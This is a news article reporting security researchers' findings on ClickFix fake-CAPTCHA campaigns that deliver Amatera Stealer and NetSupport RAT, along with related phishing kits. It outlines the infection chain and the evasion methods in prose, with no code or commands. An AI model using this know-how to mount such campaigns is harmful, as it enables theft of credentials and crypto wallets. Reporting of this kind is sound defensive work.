- Malware operations are using the ClickFix social engineering method to spread Amatera Stealer and NetSupport RAT.
- Amatera is an updated version of ACR Stealer available via subscription, offering extensive data theft with advanced evasion tactics.
- The attack chain involves deceptive CAPTCHA verification through Windows Run commands launching PowerShell scripts and loading malware.
- NetSupport RAT deployment depends on identifying valuable data or domain membership on the victim’s device.
- Multiple phishing campaigns use varied malware delivery methods, including fake invoices, manipulated websites, and obfuscated phishing kits.
Cybersecurity experts identified ongoing malware campaigns exploiting the ClickFix social engineering technique to distribute two key threats: Amatera Stealer and NetSupport RAT. This activity, observed in November 2025, is monitored by eSentire under the label EVALUSION.
Amatera, first seen in June 2025, is a development from the ACR (“AcridRain”) Stealer malware, which ceased sales in July 2024. It is now sold via subscription ranging from approximately $199 per month to $1,499 annually. According to eSentire, Amatera enables threat actors to extract sensitive information from crypto wallets, browsers, messaging apps, FTP clients, and email services. It employs advanced evasion strategies, including WoW64 SysCalls, to bypass common Sandbox, antivirus, and endpoint detection systems.
The ClickFix method deceives victims into running harmful commands through the Windows Run dialog as part of a bogus CAPTCHA on a phishing page. This triggers a multi-step process where “mshta.exe” executes a PowerShell script that downloads a .NET Dynamic Link Library (DLL) from the MediaFire file Hosting service. This DLL, the Amatera Stealer payload, is obfuscated with PureCrypter—a C#-based tool also marketed as malware-as-a-service by an actor named PureCoder. Upon injection into the “MSBuild.exe” process, the stealer collects data and contacts a remote server, which may issue a PowerShell command to install NetSupport RAT.
eSentire noted that the PowerShell script checks if the target computer belongs to a domain or hosts potentially valuable files, such as cryptocurrency wallets. If neither condition is met, NetSupport RAT is not downloaded.
This pattern aligns with several other phishing efforts distributing various malware types. These include emails carrying Visual Basic Script attachments that pose as invoices to deliver XWorm through PowerShell loaders; compromised websites with malicious JavaScript redirecting visitors to fake ClickFix pages mimicking Cloudflare Turnstile CAPTCHA, installing NetSupport RAT as part of the SmartApeSG campaign; and counterfeit Booking.com sites deploying fake CAPTCHA prompts to execute malicious PowerShell commands launching credential stealers via the Windows Run dialog.
Further tactics involve spoofed emails simulating internal “email delivery” alerts to steal login credentials and phishing kits named Cephas and Tycoon 2FA directing users to malicious login pages. Barracuda’s analysis highlighted Cephas’s unique obfuscation method, which inserts random invisible characters into its code to evade anti-phishing detectors and disrupt signature-based detection systems, as detailed in their recent report.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Trump Admin Eyes IRS Access to Tax Foreign Crypto Accounts
- Tom Lee Says Ethereum Nearing Valuation Bottom, Eyes Price Rebound
- ICIJ Exposes $408M Binance Crypto Links to Crime Networks
- Trump Org to Tokenize New Luxury Maldives Resort by 2028
- Avalanche’s Granite Upgrade Boosts Speed, Cuts Crosschain Costs
